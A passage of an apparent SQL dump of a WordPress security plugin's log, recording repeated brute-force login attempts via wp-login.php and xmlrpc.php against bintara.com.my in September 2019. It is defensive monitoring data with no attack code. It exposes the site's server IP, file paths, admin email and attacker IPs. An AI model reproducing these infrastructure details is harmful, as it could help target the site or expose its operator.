Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.72.200\";s:11:\"REMOTE_PORT\";s:5:\"58770\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFB7475s89pqgR69SLRKQAAAYI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568752111.096\";s:12:\"REQUEST_TIME\";s:10:\"1568752111\";}}','notice','2019-09-17 20:28:32','2019-09-17 20:28:31',17740200,19230176,'https://bintara.com.my/wp-login.php',1,0,'144.217.72.200'),(24728,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.72.200\";s:11:\"REMOTE_PORT\";s:5:\"59530\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFB8o75s89pqgR69SLRKwAAAY0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568752114.0816\";s:12:\"REQUEST_TIME\";s:10:\"1568752114\";}}','notice','2019-09-17 20:28:35','2019-09-17 20:28:34',18255584,19554272,'https://bintara.com.my/xmlrpc.php',1,0,'144.217.72.200'),(24729,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"91.227.6.17\";s:11:\"REMOTE_PORT\";s:5:\"39828\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFDRiR0vdvYEIduPCLNUgAAAQU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568752454.1233\";s:12:\"REQUEST_TIME\";s:10:\"1568752454\";}}','notice','2019-09-17 20:34:15','2019-09-17 20:34:14',17739512,19231280,'https://bintara.com.my/wp-login.php',1,0,'91.227.6.17'),(24730,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"91.227.6.17\";s:11:\"REMOTE_PORT\";s:5:\"40418\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFDSSqbKGlf1IVly7N3lAAAAVQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568752458.0614\";s:12:\"REQUEST_TIME\";s:10:\"1568752458\";}}','notice','2019-09-17 20:34:19','2019-09-17 20:34:18',18255504,19555248,'https://bintara.com.my/xmlrpc.php',1,0,'91.227.6.17'),(24731,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.44.163.100\";s:11:\"REMOTE_PORT\";s:5:\"38776\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFDcY75s89pqgR69SLR5AAAAZA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568752497.5599\";s:12:\"REQUEST_TIME\";s:10:\"1568752497\";}}','notice','2019-09-17 20:34:58','2019-09-17 20:34:57',17740216,19230112,'https://bintara.com.my/wp-login.php',1,0,'142.44.163.100'),(24732,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.44.163.100\";s:11:\"REMOTE_PORT\";s:5:\"39708\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFDdW4SfF9g@8lNlxwgxQAAAFA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568752501.3244\";s:12:\"REQUEST_TIME\";s:10:\"1568752501\";}}','notice','2019-09-17 20:35:04','2019-09-17 20:35:01',18255600,19554272,'https://bintara.com.my/xmlrpc.php',1,0,'142.44.163.100'),(24733,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.212.173\";s:11:\"REMOTE_PORT\";s:5:\"54126\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFFKCqbKGlf1IVly7N31QAAAUs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568752936.3298\";s:12:\"REQUEST_TIME\";s:10:\"1568752936\";}}','notice','2019-09-17 20:42:17','2019-09-17 20:42:16',17739848,19230680,'https://bintara.com.my/wp-login.php',1,0,'178.128.212.173'),(24734,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.212.173\";s:11:\"REMOTE_PORT\";s:5:\"55138\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFFL475s89pqgR69SLSpQAAAZc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568752943.2848\";s:12:\"REQUEST_TIME\";s:10:\"1568752943\";}}','notice','2019-09-17 20:42:24','2019-09-17 20:42:23',18256256,19552968,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.212.173'),(24735,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.82.122.216\";s:11:\"REMOTE_PORT\";s:5:\"42626\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFGfyR0vdvYEIduPCLNgQAAAQc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568753279.8029\";s:12:\"REQUEST_TIME\";s:10:\"1568753279\";}}','notice','2019-09-17 20:48:00','2019-09-17 20:48:00',17739848,19230688,'https://bintara.com.my/wp-login.php',1,0,'80.82.122.216'),(24736,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 